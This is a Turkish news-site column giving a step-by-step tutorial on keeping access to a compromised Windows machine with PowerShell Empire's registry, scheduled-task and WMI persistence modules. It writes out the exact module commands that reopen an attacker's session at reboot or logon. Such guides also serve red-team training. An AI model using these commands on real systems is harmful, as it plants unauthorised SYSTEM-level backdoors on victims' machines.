Ana Sayfa Arama Galeri Video Yazarlar
Üyelik
Üye Girişi
Yayın/Gazete
Yayınlar
Kategoriler
Servisler
Nöbetçi Eczaneler Sayfası Nöbetçi Eczaneler Hava Durumu Namaz Vakitleri Puan Durumu
WhatsApp
WhatsApp İhbar Hattı
Sosyal Medya
Uygulamamızı İndir
Sercan BAYRAM
Sercan BAYRAM
e-posta: sercan.bayram@tv90haber.com YAZARIN TÜM YAZILARI

PowerShell Empire ile Windows Kalıcılığı

Kalıcılık Modülleri ve Tetikleyicileri

Kalıcılık elde etmek için kullanılan kayıt defteri yöntemleri, yükümüzü sisteme tetiklemek için HKLM sürümünü kullanan en eski yöntemlerden biridir . Makalemizde göstereceğimiz bazı kalıcılık yöntemlerinde schtasks seçeneği bulunur. Bu seçenek, yükün DailyTime (yani herhangi bir zamanda) veya kullanıcı oturum açtığında yükü tetikleyen OnLogon seçeneği kullanılarak tetiklenmesini sağladığı için modülü biraz daha karmaşık hale getirir . OnLogon seçeneği bir komut istemi görüntülemez ve SYSTEM olarak çalışır.

WMI modülü, çoğunlukla en çok tercih edilen kalıcılık yöntemidir. Günlük Zaman’da (yani belirli bir zamanda) veya başlangıçta kalıcı bir WMI yükü eklemenize olanak tanır . Bu modül, SYSTEM olarak çalışır ve kullanıcının oturum açmış olmasına bağlı değildir .

Empire’da Kalıcılık Modüllerini Kullanma

Makalemizde göstereceğimiz kalıcılık modülleri şu şekildedir:

  • Persistence/elevated/registry
  • Persistence/elevated/schtask
  • Persistence/elevated/wmi

Öncelikle, empire üzerinden yükseltilmiş bir oturuma (yönetici haklarına sahip oturum) sahip olmamız gerekiyor . Söz konusu oturumu nasıl edineceğinizi öğrenmek için buraya tıklayın . Resimde görebileceğiniz gibi, yüksek bütünlük değerini 1 olarak ayarladık, yani yönetici ayrıcalıklarına sahibiz. Şimdi, yukarıda listelenen ilk kalıcılık modülünü kullanacağız ve bunun için aşağıdaki komutları kullanacağız:

usemodule persistence/elevated/registry*
set Listener http
execute

PowerShell Empire ile Windows Kalıcılığı

Yukarıdaki modül çalıştırılıp hedef makine yeniden başlatıldığında, aşağıdaki resimde gösterildiği gibi otomatik olarak oturumunuz tekrar açılacaktır:

PowerShell Empire ile Windows Kalıcılığı

Bir sonraki modülümüz persistence/elevated/schtasks. Bu, bir öncekinden biraz farklı çünkü burada oturumumuzu açmak istediğimiz belirli bir zamanı ayarlayabiliyoruz. Yine yönetici ayrıcalıklarıyla bir oturum açtıktan sonra, söz konusu persistence modülünü etkinleştirmek için aşağıdaki komut setini kullanacağız:

usemodule persistence/elevated/schtasks*
set OnLogon True
set Listener http
execute

OnLogon seçeneği sayesinde kullanıcı sisteme giriş yaptığında oturumunuz size geri dönecektir, bunun için aşağıdaki görsele bakınız :

PowerShell Empire ile Windows Kalıcılığı

Son olarak persistence /elevated/ wmi modülünü kullanacağız ve bunu kullanmak için aşağıdaki komut setini yazacağız:

usemodule persistence/elevated/wmi*
set Listener http
set AtStartup True
execute

Başlangıç ​​seçeneğini true olarak ayarladığımızda, hedef makine başlatılır başlatılmaz aşağıdaki resimde gösterildiği gibi oturumunuz başlayacaktır:

PowerShell Empire ile Windows Kalıcılığı

YORUMLAR

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

YAZARLAR
TÜMÜ

SON HABERLER